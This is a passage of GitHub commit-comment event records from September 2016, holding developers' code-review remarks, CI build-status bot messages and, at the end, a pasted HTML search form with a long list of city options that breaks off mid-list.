{"id":"4504708055","type":"CommitCommentEvent","actor":{"login":"arr2036"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":18869566,"position":null,"line":null,"path":null,"commit_id":"47a39c1522bf8bca8f37b8826028181b25fcc17f","created_at":"2016-09-01T19:46:59Z","updated_at":"2016-09-01T19:46:59Z","body":"Seriously, the operation completes without an error, and sets a NULL pointer‽ *sigh*"}},"created_at":"2016-09-01T19:46:59Z"}
{"id":"4504708798","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869568,"position":14,"line":14,"path":"SeamCarve.Back/src/FileRepository/FileRepository.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:47:10Z","updated_at":"2016-09-01T19:47:10Z","body":"You can make you assert: Debug.Assert(Directory.Exists(_storageFolder)) here ( in case you expect client should check storage directory before, and you asserts only to be sure it did its work.\r\nOr, alternatively you can check storage folder and raise exception. "}},"created_at":"2016-09-01T19:47:10Z"}
{"id":"4504710163","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869569,"position":54,"line":54,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"b56a22b545e881595829f0fbc10a4c79ec08dad2","created_at":"2016-09-01T19:47:25Z","updated_at":"2016-09-01T19:47:25Z","body":"It looks like `ostree_option_context_parse` does this already and it's unnecessary (and it would make it `--repo` not be the first option if we actually supplied any options)."}},"created_at":"2016-09-01T19:47:25Z"}
{"id":"4504710770","type":"CommitCommentEvent","actor":{"login":"arr2036"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":18869570,"position":null,"line":null,"path":null,"commit_id":"47a39c1522bf8bca8f37b8826028181b25fcc17f","created_at":"2016-09-01T19:47:32Z","updated_at":"2016-09-01T19:47:32Z","body":"there's probably others like that..."}},"created_at":"2016-09-01T19:47:32Z"}
{"id":"4504712415","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869575,"position":84,"line":84,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"b56a22b545e881595829f0fbc10a4c79ec08dad2","created_at":"2016-09-01T19:47:50Z","updated_at":"2016-09-01T19:47:50Z","body":"Suer."}},"created_at":"2016-09-01T19:47:50Z"}
{"id":"4504714048","type":"CommitCommentEvent","actor":{"login":"yzhwang"},"repo":{"name":"gunrock/gunrock"},"payload":{"comment":{"id":18869577,"position":null,"line":null,"path":null,"commit_id":"d971a8405acba0c29794470c94721e7ed1ec28ec","created_at":"2016-09-01T19:48:09Z","updated_at":"2016-09-01T19:48:09Z","body":"will do today. Thanks @sgpyc !"}},"created_at":"2016-09-01T19:48:09Z"}
{"id":"4504714457","type":"CommitCommentEvent","actor":{"login":"adleong"},"repo":{"name":"monzo/linkerd"},"payload":{"comment":{"id":18869580,"position":null,"line":null,"path":null,"commit_id":"39dd9c538c300bfce6060653b8d73838de891e85","created_at":"2016-09-01T19:48:13Z","updated_at":"2016-09-01T19:48:13Z","body":"Ah yes, you're exactly right.  In that case, I think this _is_ the correct fix.  Would you like to create a PR with this?  I've got a unit test for this that I can contribute as well."}},"created_at":"2016-09-01T19:48:13Z"}
{"id":"4504717506","type":"CommitCommentEvent","actor":{"login":"Moorviper"},"repo":{"name":"Moorviper/hopglass"},"payload":{"comment":{"id":18869585,"position":null,"line":null,"path":null,"commit_id":"2999ee9efcc048fb7af5a0451e37866df48e08aa","created_at":"2016-09-01T19:48:48Z","updated_at":"2016-09-01T19:48:48Z","body":"still brocken (grafana graph) :-/"}},"created_at":"2016-09-01T19:48:48Z"}
{"id":"4504720353","type":"CommitCommentEvent","actor":{"login":"AndrePelogia"},"repo":{"name":"AndrePelogia/test-dev"},"payload":{"comment":{"id":18869595,"position":null,"line":null,"path":null,"commit_id":"e5f68b27ca32b06d307f23348ff20f0841c712e6","created_at":"2016-09-01T19:49:23Z","updated_at":"2016-09-01T19:49:23Z","body":"[test-dev.zip](https://github.com/AndrePelogia/test-dev/files/450547/test-dev.zip)\r\n"}},"created_at":"2016-09-01T19:49:23Z"}
{"id":"4504720563","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869596,"position":null,"line":null,"path":null,"commit_id":"5840cba21d437cbe76e7dcd5d0e732cc2f0115cc","created_at":"2016-09-01T19:49:26Z","updated_at":"2016-09-01T19:49:26Z","body":"Makes sense. In my original development, I think it made sense to keep them separated, but now it just adds rebase noise."}},"created_at":"2016-09-01T19:49:26Z"}
{"id":"4504721406","type":"CommitCommentEvent","actor":{"login":"AndrePelogia"},"repo":{"name":"AndrePelogia/test-dev"},"payload":{"comment":{"id":18869599,"position":null,"line":null,"path":null,"commit_id":"e5f68b27ca32b06d307f23348ff20f0841c712e6","created_at":"2016-09-01T19:49:36Z","updated_at":"2016-09-01T19:49:36Z","body":"Teste Estadão"}},"created_at":"2016-09-01T19:49:36Z"}
{"id":"4504725775","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18869611,"position":null,"line":null,"path":null,"commit_id":"20e2cf86b543e8479c0f62c2da7ca7c64b4c85a9","created_at":"2016-09-01T19:50:28Z","updated_at":"2016-09-01T19:50:28Z","body":"oh wow, way to go gradle."}},"created_at":"2016-09-01T19:50:28Z"}
{"id":"4504728907","type":"CommitCommentEvent","actor":{"login":"PPPI"},"repo":{"name":"nbdd0121/lowrisc-videox"},"payload":{"comment":{"id":18869614,"position":168,"line":168,"path":"stream_dct_handler.sv","commit_id":"678142a73b4c154cc6aeadcee602863709f0f985","created_at":"2016-09-01T19:51:04Z","updated_at":"2016-09-01T19:51:04Z","body":"this should be 'if ((out_count_to_16 == 'hF) && have_seen_last) out_ch.t_last <= 'd1;'"}},"created_at":"2016-09-01T19:51:04Z"}
{"id":"4504729947","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869617,"position":47,"line":47,"path":"SeamCarve.Back/src/FileRepository/FileRepository.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:51:16Z","updated_at":"2016-09-01T19:51:16Z","body":"Probably, the better would be to ask some method give you target file location. Just GetTargetFileLocation(id) would give you where to store. What are benefits of such approach? "}},"created_at":"2016-09-01T19:51:16Z"}
{"id":"4504731252","type":"CommitCommentEvent","actor":{"login":"Birajhow"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18869622,"position":null,"line":null,"path":null,"commit_id":"92bc6da6ca770e2ec73517ce46695cde74dbb115","created_at":"2016-09-01T19:51:31Z","updated_at":"2016-09-01T19:51:31Z","body":"Fiz o ARQUIVO.md ontem. "}},"created_at":"2016-09-01T19:51:31Z"}
{"id":"4504733501","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18869628,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T19:51:57Z","updated_at":"2016-09-01T19:51:57Z","body":"@ramapcsx2 new version with the request fix for LWC2/SWC2. Feel free to double check it."}},"created_at":"2016-09-01T19:51:57Z"}
{"id":"4504735712","type":"CommitCommentEvent","actor":{"login":"Birajhow"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18869631,"position":null,"line":null,"path":null,"commit_id":"92bc6da6ca770e2ec73517ce46695cde74dbb115","created_at":"2016-09-01T19:52:24Z","updated_at":"2016-09-01T19:52:24Z","body":"ARTIGO.md*"}},"created_at":"2016-09-01T19:52:24Z"}
{"id":"4504737247","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18869636,"position":null,"line":null,"path":null,"commit_id":"fb139fcd84c95ef007c81ac48b9833fe13b7909d","created_at":"2016-09-01T19:52:41Z","updated_at":"2016-09-01T19:52:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;68qon78w&#x2F;11-pay-to-bank-collect-from-bank\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Pay to bank&#x2F;collect from bank</a>"}},"created_at":"2016-09-01T19:52:41Z"}
{"id":"4504737829","type":"CommitCommentEvent","actor":{"login":"marxarelli"},"repo":{"name":"bbatsov/ruby-style-guide"},"payload":{"comment":{"id":18869639,"position":null,"line":null,"path":null,"commit_id":"07225a3b682b806d84de668cf7d2d945f3f6ea20","created_at":"2016-09-01T19:52:47Z","updated_at":"2016-09-01T19:52:47Z","body":"> With that in mind, let me turn that question around on you: why use alias at all when the benefits of doing so are so unclear? alias_method already does everything alias does and more, so why bother introducing another keyword with its own special syntax that could otherwise just be ignored?\r\n\r\nFair question but I fear our discussion is now cyclical! Why use `alias`? Because it's very succinct, has syntax that's consistent with the keyword `def` which it complements, has been there since the inception of the language, and serves 99% of use cases. Then why use `alias_method`? Because it is also fairly succinct, accomplishes the same as `alias` as well as more marginal use cases, and has syntax that's consistent with `attr_*` and other \"macro\" methods.\r\n\r\n> Just because it's not a new addition, doesn't mean it adds no complexity.\r\n> There are a lot of constructs in Ruby which have been around for a long time whose use is now discouraged; this style guide is full of them.\r\n\r\nYes, but I've never seen `alias` actively discouraged on account of a cohesive argument against it—at best, we get to where we're at right now, which is that either works just fine. I submitted this particular change because I felt the hard stance against `alias` proliferated a misunderstanding of the keyword's implementation, and I tried my best to indicate a recommendation for `alias` in specific cases rather than a staunch and authoritative viewpoint. If you disagree with the recommendation, I encourage you not to follow it.\r\n\r\nI personally really value your feedback here but I think if you'd like to see a more substantial and meaningful change to the style guide, you should consider submitting a pull request along with your arguments. For what it's worth, I wholeheartedly support a simplification of the guide, and even more so for `rubocop`. That's why I implemented the `StyleGuideCopsOnly` config feature and why our organization has drastically limited the [rules we enforce](https://www.mediawiki.org/wiki/Manual:Coding_conventions/Ruby)."}},"created_at":"2016-09-01T19:52:47Z"}
{"id":"4504741026","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18869643,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-01T19:53:24Z","updated_at":"2016-09-01T19:53:24Z","body":"Пользователь вводит название текстового документа(или путь к файлу) и максимальную длину строки,  ожидается что программа вернет текст, разбитый на строки длинной не больше чем заданная(не разрывая слова)\r\n"}},"created_at":"2016-09-01T19:53:24Z"}
{"id":"4504743679","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"andrewrk/zig"},"payload":{"comment":{"id":18869652,"position":null,"line":null,"path":null,"commit_id":"f18e34c2c6b7884a76d98d86b41857044dbe0f06","created_at":"2016-09-01T19:53:55Z","updated_at":"2016-09-01T19:53:55Z","body":"> Ideally any user should trust automatic header generation without hitting any of these TODOs. I know it'll be a lot of work but it's necessary.\r\n\r\nAgreed. Zig is moving steadily toward 0.1.0 release, but it's not there yet.\r\n\r\nOf course, any contributions toward this goal are welcome."}},"created_at":"2016-09-01T19:53:55Z"}
{"id":"4504745434","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18869657,"position":null,"line":null,"path":null,"commit_id":"7b6f16324955c2b8936bb98bd51462e9b6901944","created_at":"2016-09-01T19:54:16Z","updated_at":"2016-09-01T19:54:16Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/php-versions](https://peterpanth-static-docs.pantheonsite.io/docs/php-versions)\n"}},"created_at":"2016-09-01T19:54:16Z"}
{"id":"4504745501","type":"CommitCommentEvent","actor":{"login":"lvkv"},"repo":{"name":"lvkv/Simple-Renamer"},"payload":{"comment":{"id":18869659,"position":null,"line":null,"path":null,"commit_id":"0778e1d0838992b0e5b6259412faa9b58465b58b","created_at":"2016-09-01T19:54:17Z","updated_at":"2016-09-01T19:54:17Z","body":"The \"Rename Files\" tab is finished! Halfway done with the entire project"}},"created_at":"2016-09-01T19:54:17Z"}
{"id":"4504747519","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18869665,"position":null,"line":null,"path":null,"commit_id":"fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d","created_at":"2016-09-01T19:54:39Z","updated_at":"2016-09-01T19:54:39Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T19:54:39Z"}
{"id":"4504748633","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18869666,"position":null,"line":null,"path":null,"commit_id":"fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d","created_at":"2016-09-01T19:54:52Z","updated_at":"2016-09-01T19:54:52Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T19:54:52Z"}
{"id":"4504751742","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869670,"position":53,"line":50,"path":"SeamCarve.Back/src/tests/ApiTests/WebApiTests.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:55:28Z","updated_at":"2016-09-01T19:55:28Z","body":"The same as in file repository, you can ask to give you path to asset and don't care about this concatenation.\r\nAlso please avid concatinating paths by \"+\", use Path.Combine instead."}},"created_at":"2016-09-01T19:55:28Z"}
{"id":"4504752572","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18869673,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-01T19:55:37Z","updated_at":"2016-09-01T19:55:37Z","body":"Но выводит текст с пробелом перед каждым первым словом, т.е не работает .split() который должен убрать пробелы в начале строки\r\n "}},"created_at":"2016-09-01T19:55:37Z"}
{"id":"4504754211","type":"CommitCommentEvent","actor":{"login":"MarkY-LunarG"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18869676,"position":6,"line":40,"path":"layers/swapchain.cpp","commit_id":"806a9ad302df9bf595fc3debf57385e04934ef39","created_at":"2016-09-01T19:55:57Z","updated_at":"2016-09-01T19:55:57Z","body":"Crud, no."}},"created_at":"2016-09-01T19:55:57Z"}
{"id":"4504755596","type":"CommitCommentEvent","actor":{"login":"maccam912"},"repo":{"name":"kartikparnami/python-rake"},"payload":{"comment":{"id":18869679,"position":null,"line":null,"path":null,"commit_id":"ef6b11f9087bdb44bfaa95010e3e6feacfae8a34","created_at":"2016-09-01T19:56:14Z","updated_at":"2016-09-01T19:56:14Z","body":"This one change fixed python 3 issues for me. thanks!"}},"created_at":"2016-09-01T19:56:14Z"}
{"id":"4504757946","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869690,"position":16,"line":13,"path":"SeamCarve.Back/src/tests/Environment.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:56:41Z","updated_at":"2016-09-01T19:56:41Z","body":"I would choose Dictionary<Name, >  so you can ask something like TestAssets[\"CoolAsset1.jpg\"]."}},"created_at":"2016-09-01T19:56:41Z"}
{"id":"4504758629","type":"CommitCommentEvent","actor":{"login":"JerJohn15"},"repo":{"name":"JerJohn15/laverna"},"payload":{"comment":{"id":18869695,"position":null,"line":null,"path":null,"commit_id":"c958a3b82ea2e3a793f2d037070aa83adf6e72f0","created_at":"2016-09-01T19:56:49Z","updated_at":"2016-09-01T19:56:49Z","body":"The ability to click the header title as a button has also been removed and instead is used by the NavBar menu icon."}},"created_at":"2016-09-01T19:56:49Z"}
{"id":"4504759998","type":"CommitCommentEvent","actor":{"login":"devmsh"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18869699,"position":19,"line":19,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T19:57:07Z","updated_at":"2016-09-01T19:57:07Z","body":"100%\r\nطبعاً هاي طريقة من الطرق ومش الطريقة الوحيدة الي ممكن نحل فيها الموضوع\r\nبس اعتقد انها حالياً مناسبة جداً"}},"created_at":"2016-09-01T19:57:07Z"}
{"id":"4504762769","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18869706,"position":null,"line":null,"path":null,"commit_id":"fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d","created_at":"2016-09-01T19:57:41Z","updated_at":"2016-09-01T19:57:41Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T19:57:41Z"}
{"id":"4504763932","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18869710,"position":null,"line":null,"path":null,"commit_id":"fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d","created_at":"2016-09-01T19:57:54Z","updated_at":"2016-09-01T19:57:54Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T19:57:54Z"}
{"id":"4504765052","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18869718,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-01T19:58:08Z","updated_at":"2016-09-01T19:58:08Z","body":"I have added a statement `dbg_mean_of(weight < 0);` on line 710 of evaluate.cpp to measure how often 2 * ei.pi->open_files() is greater than pos.count<ALL_PIECES>(Us), the result is 98 times out of 2995006, which is 0.003%, so this seems rare enough."}},"created_at":"2016-09-01T19:58:08Z"}
{"id":"4504768157","type":"CommitCommentEvent","actor":{"login":"ericek111"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18869729,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-01T19:58:42Z","updated_at":"2016-09-01T19:58:42Z","body":"oh noh, rip log system :'( "}},"created_at":"2016-09-01T19:58:42Z"}
{"id":"4504770166","type":"CommitCommentEvent","actor":{"login":"devmsh"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18869733,"position":38,"line":38,"path":"OrderTest.php","commit_id":"c87793c83fcb9d05bad48368dd8d394350babfa5","created_at":"2016-09-01T19:59:08Z","updated_at":"2016-09-01T19:59:08Z","body":"We already have the `$order` instance, so we can simple call `$this->id` inside the method, and it will be the same value as the passed `$order->id`?"}},"created_at":"2016-09-01T19:59:08Z"}
{"id":"4504770424","type":"CommitCommentEvent","actor":{"login":"Birajhow"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18869734,"position":null,"line":null,"path":null,"commit_id":"92bc6da6ca770e2ec73517ce46695cde74dbb115","created_at":"2016-09-01T19:59:11Z","updated_at":"2016-09-01T19:59:11Z","body":"**Você até comentou** 👍  \r\n\r\n![](https://scontent.fsdu5-1.fna.fbcdn.net/v/t34.0-12/14182424_1289231487767747_767664919_n.jpg?oh=5e313515408b80585fbbae95e9ab84a0&oe=57CA1A27)"}},"created_at":"2016-09-01T19:59:11Z"}
{"id":"4504771619","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869736,"position":10,"line":10,"path":"SeamCarve.Back/src/tests/UnitTests/FileStorageTests.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:59:24Z","updated_at":"2016-09-01T19:59:24Z","body":"Please, name all you tests with the same name as component + test. So that this would be FileRepositoryTests.cs (and the same test fixture name)"}},"created_at":"2016-09-01T19:59:24Z"}
{"id":"4504772391","type":"CommitCommentEvent","actor":{"login":"WebOnUs"},"repo":{"name":"WebOnUs/Learning-Project"},"payload":{"comment":{"id":18869737,"position":null,"line":null,"path":null,"commit_id":"a2bf34a919aa9897d1e8112d7d70a66453fb8b37","created_at":"2016-09-01T19:59:33Z","updated_at":"2016-09-01T19:59:33Z","body":"<div style=\"background-image:url('/opt-in-email/images/top.jpg'); background-position:top left; background-repeat:no-repeat; padding:30px;\">\r\n\r\n                    <div style=\"float:left; width:204px;\">\r\n                        <div style=\" margin-top:25px;width:204px; background-color:#fee1b9; border:solid 1px #fe8510\" class=\"ui-corner-all\">\r\n                            <div style=\"width:180px; margin:10px;background-color:#ffffff; border:solid 1px #fe8510\" class=\"ui-corner-all\">\r\n                                <div style=\"margin:5px; text-align:center; min-height:85px;\">\r\n                                    <p><strong>Data Results</strong></p>\r\n                                    <div id=\"result\"></div>\r\n                                </div>\r\n                            </div>\r\n                        </div>\r\n                    </div>\r\n                    <div class=\"date-order-area\" style=\"float:left; width:380px;margin-left:10px;\">\r\n                        <ul class=\"ui-tabs-nav\">\r\n                            <li id=\"Search_liConsumers\" class=\"ui-tabs-selected\"><a onclick=\"$('#tabs-1').show(); $('#Search_liConsumers').addClass('ui-tabs-selected');$('#tabs-2').hide(); $('#Search_liBusiness').removeClass('ui-tabs-selected');\" href=\"javascript:;\">Consumers</a></li>\r\n                            <li id=\"Search_liBusiness\"><a onclick=\"$('#tabs-1').hide(); $('#Search_liConsumers').removeClass('ui-tabs-selected');$('#tabs-2').show(); $('#Search_liBusiness').addClass('ui-tabs-selected');\" href=\"javascript:;\">Business</a></li>\r\n                        </ul>\r\n                        <div style=\"width:380px; background-color:#fee1b9; border:solid 1px #fe8510;\" class=\"ui-corner-all\">\r\n                            <div id=\"tabs-1\">\r\n                                <div style=\"width:360px; margin:10px;background-color:#ffffff; border:solid 1px #fe8510; display:table;\" class=\"ui-corner-all\">\r\n                                    <div style=\"margin:5px; text-align:left\">\r\n                                        <span onclick=\"$('#dv_consumer_geo').toggle();\" style=\"cursor:pointer; font-weight:bold\">Geography</span>\r\n                                    </div>\r\n                                    <div id=\"dv_consumer_geo\" style=\"margin:5px; text-align:center\">\r\n                                        <!-- Tab 1 Data starts from here -->\r\n                                        <div id=\"dv_city\" class=\"show\">\r\n                                            <form id=\"form_city\" name=\"form_city\" method=\"post\" action=\"http://www.emarketingsol.com/demo5.php\">\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>City:</td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <div id=\"inner_cities\" style=\"width:125px;\">\r\n                                                                <select class=\"multiselect\" name=\"city\"><option value=\"Abbeville\">Abbeville</option><option value=\"Abernant\">Abernant</option><option value=\"Adamsville\">Adamsville</option><option value=\"Addison\">Addison</option><option value=\"Adger\">Adger</option><option value=\"Akron\">Akron</option><option value=\"Alabaster\">Alabaster</option><option value=\"Alberta\">Alberta</option><option value=\"Albertville\">Albertville</option><option value=\"Alexander City\">Alexander City</option><option value=\"Alexandria\">Alexandria</option><option value=\"Aliceville\">Aliceville</option><option value=\"Allgood\">Allgood</option><option value=\"Alma\">Alma</option><option value=\"Alpine\">Alpine</option><option value=\"Alton\">Alton</option><option value=\"Altoona\">Altoona</option><option value=\"Andalusia\">Andalusia</option><option value=\"Anderson\">Anderson</option><option value=\"Annemanie\">Annemanie</option><option value=\"Anniston\">Anniston</option><option value=\"Arab\">Arab</option><option value=\"Ardmore\">Ardmore</option><option value=\"Ariton\">Ariton</option><option value=\"Arley\">Arley</option><option value=\"Arlington\">Arlington</option><option value=\"Ashford\">Ashford</option><option value=\"Ashland\">Ashland</option><option value=\"Ashville\">Ashville</option><option value=\"Athens\">Athens</option><option value=\"Atmore\">Atmore</option><option value=\"Attalla\">Attalla</option><option value=\"Auburn\">Auburn</option><option value=\"Auburn University\">Auburn University</option><option value=\"Autaugaville\">Autaugaville</option><option value=\"Axis\">Axis</option><option value=\"Baileyton\">Baileyton</option><option value=\"Banks\">Banks</option><option value=\"Bankston\">Bankston</option><option value=\"Bay Minette\">Bay Minette</option><option value=\"Bayou La Batre\">Bayou La Batre</option><option value=\"Bear Creek\">Bear Creek</option><option value=\"Beatrice\">Beatrice</option><option value=\"Beaverton\">Beaverton</option><option value=\"Belk\">Belk</option><option value=\"Bellamy\">Bellamy</option><option value=\"Belle Mina\">Belle Mina</option><option value=\"Bellwood\">Bellwood</option><option value=\"Berry\">Berry</option><option value=\"Bessemer\">Bessemer</option><option value=\"Billingsley\">Billingsley</option><option value=\"Birmingham\">Birmingham</option><option value=\"Black\">Black</option><option value=\"Blountsville\">Blountsville</option><option value=\"Boaz\">Boaz</option><option value=\"Boligee\">Boligee</option><option value=\"Bon Air\">Bon Air</option><option value=\"Bon Secour\">Bon Secour</option><option value=\"Booth\">Booth</option><option value=\"Boykin\">Boykin</option><option value=\"Brantley\">Brantley</option><option value=\"Bremen\">Bremen</option><option value=\"Brent\">Brent</option><option value=\"Brewton\">Brewton</option><option value=\"Bridgeport\">Bridgeport</option><option value=\"Brierfield\">Brierfield</option><option value=\"Brilliant\">Brilliant</option><option value=\"Brooklyn\">Brooklyn</option><option value=\"Brookside\">Brookside</option><option value=\"Brookwood\">Brookwood</option><option value=\"Brownsboro\">Brownsboro</option><option value=\"Brundidge\">Brundidge</option><option value=\"Bryant\">Bryant</option><option value=\"Bucks\">Bucks</option><option value=\"Buhl\">Buhl</option><option value=\"Burnwell\">Burnwell</option><option value=\"Butler\">Butler</option><option value=\"Bynum\">Bynum</option><option value=\"Calera\">Calera</option><option value=\"Calvert\">Calvert</option><option value=\"Camden\">Camden</option><option value=\"Camp Hill\">Camp Hill</option><option value=\"Campbell\">Campbell</option><option value=\"Capshaw\">Capshaw</option><option value=\"Carbon Hill\">Carbon Hill</option><option value=\"Cardiff\">Cardiff</option><option value=\"Carlton\">Carlton</option><option value=\"Carrollton\">Carrollton</option><option value=\"Castleberry\">Castleberry</option><option value=\"Catherine\">Catherine</option><option value=\"Cecil\">Cecil</option><option value=\"Cedar Bluff\">Cedar Bluff</option><option value=\"Centre\">Centre</option><option value=\"Centreville\">Centreville</option><option value=\"Chancellor\">Chancellor</option><option value=\"Chapman\">Chapman</option><option value=\"Chatom\">Chatom</option><option value=\"Chelsea\">Chelsea</option><option value=\"Cherokee\">Cherokee</option><option value=\"Childersburg\">Childersburg</option><option value=\"Choccolocco\">Choccolocco</option><option value=\"Chunchula\">Chunchula</option><option value=\"Citronelle\">Citronelle</option><option value=\"Clanton\">Clanton</option><option value=\"Clay\">Clay</option><option value=\"Clayton\">Clayton</option><option value=\"Cleveland\">Cleveland</option><option value=\"Clinton\">Clinton</option><option value=\"Clio\">Clio</option><option value=\"Clopton\">Clopton</option><option value=\"Cloverdale\">Cloverdale</option><option value=\"Coaling\">Coaling</option><option value=\"Coden\">Coden</option><option value=\"Coffee Springs\">Coffee Springs</option><option value=\"Coffeeville\">Coffeeville</option><option value=\"Coker\">Coker</option><option value=\"Collinsville\">Collinsville</option><option value=\"Columbia\">Columbia</option><option value=\"Columbiana\">Columbiana</option><option 